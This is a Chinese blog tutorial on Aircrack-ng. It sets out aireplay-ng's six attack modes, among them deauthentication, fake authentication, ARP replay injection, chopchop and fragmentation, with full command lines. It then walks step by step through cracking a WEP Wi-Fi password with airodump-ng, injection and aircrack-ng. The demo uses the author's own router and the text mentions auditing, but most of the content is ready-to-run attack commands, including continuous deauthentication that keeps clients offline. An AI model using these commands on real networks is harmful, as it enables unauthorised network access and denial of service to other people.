【2023最新版】超详细Aircrack-ng安装保姆级教程,破译WiFi,收藏这一篇就够了

2,429 阅读8分钟

对于无线黑客而言,Aircrack-ng是一款必不可缺的无线攻击工具,可以说很大一部分无线攻击都依赖于它来完成;而对于无线安全人员而言,Aircrack-ng也是一款必备的无线安全检测工具,它可以帮助管理员进行无线网络密码的脆弱性检查及了解无线网络信号的分布情况,非常适合对企业进行无线安全审计时使用。

Aircrack-ng(注意大小写)是一个包含了多款工具的无线攻击审计套装,这里面很多工具在后面的内容中都会用到,具体见下表1为Aircrack-ng包含的组件具体列表。

开始安装aircrack-ng

简介
本教程根据官方文档整理,主要介绍如何使用aircrack-ng.
本教程主要针对linux.虽然linux可能对于很多人来说并不熟悉,但是windows对aircrack-ng的支持实在是太差了.这主要是由于操作系统的特性和无线网卡的驱动问题造成的.所以最好还是在linux平台上来使用aircrack-ng.
教程大致分为以下三部分:
1.选择网卡的芯片
2.选择以下方式中的一种来使用aircrack-ng
3.了解aircrack-ng命令,学会使用aircrack-ng
以下分别介绍

选择网卡芯片
需要说明的是,并不是所有的芯片都被aircrack-ng支持.而且有时候,即便网卡被支持,也可能不是所有的功能都被支持.
所以后续会有专门的文章介绍,如何判断自己的无线网卡是否支持aircrack-ng,以及各种网卡驱动和兼容的情况.

选择一种方式来使用aircrack-ng
1.linux发行版
使用linux发行版的优势在于灵活性很强,可以使用最新版本的aircrack-ng和驱动,缺点是相关知识要求较高
2.Live CD
使用Live CD的优势在于非常的便捷,但是相比来说可能aircrack-ng和驱动的版本都比较古老
3.虚拟机
使用虚拟机的优点是要求相对较低,但有一个很大的缺点就是必须使用USB网卡

学习aircrack-ng
需要系统学习可参见
官方文档:www.aircrack-ng.org/doku.php?id…
官方论坛:forum.aircrack-ng.org/

Aireplay-ng的六种攻击模式详解

1.冲突模式

-0 Deautenticate 冲突模式

使已经连接的合法客户端强制断开与路由端的连接,使其重新连接。在重新连接过程中获得验证数据包,从而产生有效ARP request。

如果一个客户端连在路由端上,但是没有人上网以产生有效数据,此时,即使用-3也无法生成有效ARP request 。所以此时需要用 -0 攻击模式配合,-3 攻击才会被激活

aireplay-ng -0 10 -a <ap mac> -c <my mac> wifi0
[-0] :冲突攻击模式,后面跟发送次数(设置为0,则循环攻击,不停的断开连接,客户端无法正常上网)
[-a]:设置ap的mac
[-c]: 设置已连接的合法客户端的mac
如果不设置-c,则断开所有和ap连接的合法客户端。  


aireplay-ng -3 -b <ap mac> -h <my mac> wifi0
注:使用此攻击模式的前提是必须有通过合法认证的客户端连接到路由器

2.伪装客户端连接

-1 fakeauth count 伪装客户端连接

这种模式是伪装一个客户端和AP进行连接

这步是无客户端的研究学习的第一步,因为是无合法连接的客户端,因此需要一个伪装客户端来和路由器相连。为让AP接受数据包,必须使用自己的网卡和AP关联。如果没有关联的话,目标AP将忽略所有从你网卡发送的数据包,IVS数据将不会产生

用-1伪装客户端成功连接以后才能发送注入命令,让路由器接受到注入命令后才可反馈数据从而产生数据包

aireplay-ng -1 0 -e <ap essid> -a<ap mac> -h <my mac> wifi0
参数说明:
[-1]:伪装客户端连接模式,后面跟延时
[-e]:设置AP的essid
[-a]:设置ap的mac
[-h]: 设置伪装客户端的网卡MAC(即自己网卡的MAC)

3.交互模式

-2 Interactive 交互模式

这种攻击模式是一个抓包和提数据发起攻击包,三种集合在一起的模式

1.这种模式主要用于研究学习无客户端,先用-1建立虚假客户端连接然后直接发包攻击

aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b <ap mac> -h <my mac> wifi0
参数说明:
[-2]:交互攻击模式
[-p]:设置控制帧中包含的信息(16进制),默认采用0841
[-c]:设置目标mac地址
[-b]:设置ap的mac地址
[-h]:设置伪装客户端的网卡MAC(即自己网卡MAC)

2.提取包,发送注入数据包,发包攻击

aireplay-ng -2 -r <file> 
-x 1024 wifi0-x 1024是限定发包速度,避免网卡死机,可以选择1024

4.注入攻击

-3 ARP-request 注入攻击模式

这种模式是一种抓包后分析重发的过程,这种攻击模式很有效。

既可以利用合法客户端,也可以配合-1利用虚拟连接的伪装客户端。如果有合法客户端那一般需要等几分钟,让合法客户端和ap之间通信,少量数据就可以产生有效ARP request 才可利用-3模式注入成功。如果没有任何通信存在,不能得到ARP request,则这种攻击就会失败。

aireplay-ng -3 -b <ap mac> -h <my mac> -x 512 wifi0
参数说明:
[-3]:arp 注入攻击模式
[-b]:设置ap的mac
[-h]:设置自己的mac地址
[-x]:定义每秒发哦是那个数据户包的数量,但是最高不超过1024,建议使用512(也可不定义)

5.chop攻击模式

-4 Chopchop攻击模式

用以获得一个包含密钥数据的xor文件,这种模式主要是获得一个可利用包含密钥数据的xor文件,不能用来解密数据包。而是用它来产生一个新的数据包以便我们可以进行注入。

aireplay-ng -4 -b <ap mac> -h <my mac> wifi0
参数说明:
[-b]:设置需要研究学习的AP的mac
[-h]:设置虚拟伪装连接的mac(即自己网卡的mac)

6.碎片包攻击模式

-5 fragment 碎片包攻击模式

用以获得PRGA(包含 密钥的后缀为xor的文件)这种模式主要是获得一个可利用PRGA,这里的PRGA并不是WEP key数据,不能用来解密数据包。而是利用它产生一个新的数据包以便我们可以进行注入。其工作原理就是使目标AP重新广播包,当AP重广播时,一个新的IVS将产生,我们就是利用这个来研究学习

aireplay-ng -5 -b <ap mac> -h <my mac> wifi0
[-5]:碎片包攻击模式
[-b]:设置ap的mac
[-h]:设置虚拟伪装连接的mac(即自己网卡的mac)

WEP wifi破解步骤

1.环境准备

1.1路由器介绍

演示使用的路由器支持WEP,WPA,WPS加密方式,一般家用路由器或者比较新的路由器不支持以上三种模式

1.2路由器配置

1)选择无线配置,设置wifi信道为1

2)选择无线wifi---设置安全模式

3)安全模式选择wep,输入口令,点击生成密钥,点击显示密钥,点击保存

2.查看网卡是否连接kali

ip a

3.开启Monitor Mode工作模式

airmon-ng start wlan0

4.扫描附近的wifi

确定目标wifi的信道,加密方式,信号强度,mac地址等信息

airodump-ng wlan0mon

5.对目标所在的信道进行抓包

airodump-ng wlan0mon -c 1 --ivs -w /root/wifi/bk01/WEP --bssid ff:ff:ff:ff:ff:ff
参数说明:
-c:信道
--ivs:初始化向量
-w:输出抓包文件
--bssid:指定wifi进行抓包

6.手工创建客户端连接

设备连接fiwi

7.进行ARP注入攻击

arp重放攻击,通过模拟客户端发送ARP请求,获取AP响应报文,通过AP报文获取ivs初始化向量

aireplay-ng -3 -b ?? -h ??? wlan0mon
-3:arpreplay arp重放攻击
-b:bssid AP的mac
-h:客户端的mac地址

8.使用Deautenticate攻击模式

使已经连接的合法客户端强制断开与路由端的连接,使其重新连接。在重新连接过程中获得验证数据包,从而产生有效ARP request

aireplay-ng -0 5 -a ?? -c ?? wlan0mon
-0:冲突攻击模式,后面跟发送次数(设置为0,则循环攻击,不停的断开连接,客户端无法正常上网)
-a:设置ap的mac
-c:设置已连接的合法客户端的mac

9.手动连接AP

等待Frame到2-5万时,就可以尝试破解了

10.破解wifi,获取WEP密码

aircrack-ng /root/wifi/bk01/WEP-01.ivs

将冒号去掉,就是wifi的密钥

微信公众号:程序媛lisa